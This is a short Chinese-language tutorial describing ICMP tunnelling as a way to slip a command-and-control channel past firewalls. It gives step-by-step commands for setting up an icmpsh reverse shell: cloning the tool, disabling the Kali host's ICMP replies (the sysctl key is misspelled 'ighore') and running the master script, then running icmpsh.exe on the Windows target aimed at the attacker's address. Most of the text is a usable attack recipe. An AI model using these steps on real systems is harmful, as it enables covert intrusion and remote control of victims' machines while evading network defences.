ICMP隧道:将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙通常不会过滤ping数据包),通常用于内网攻击中的绕过防火墙建立C2通道。
常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。
下载地址:https://github.com/bdamele/icmpsh
使用前提:
-
目标主机为windows系统
-
本地机器安装python2环境,安装impacket类库
利用icmpsh反弹shell
本地(kali,root用户登录)
git clone https://github.com/bdamele/icmpsh.git
pip install impacket
sysctl -w net.ipv4.icmp_echo_ighore_all=1 # 关闭系统自身的icmp回应
cd icmpsh
python2 icmpsh_m.py 【kali主机地址】 【windows主机地址】 # 运行工具
注:直接运行run.sh会报错
目标主机(windows,普通用户即可)
上面git下载的源码目录中有个icmpsh.exe文件,放到windows主机中
icmpsh.exe -t 【kali主机地址】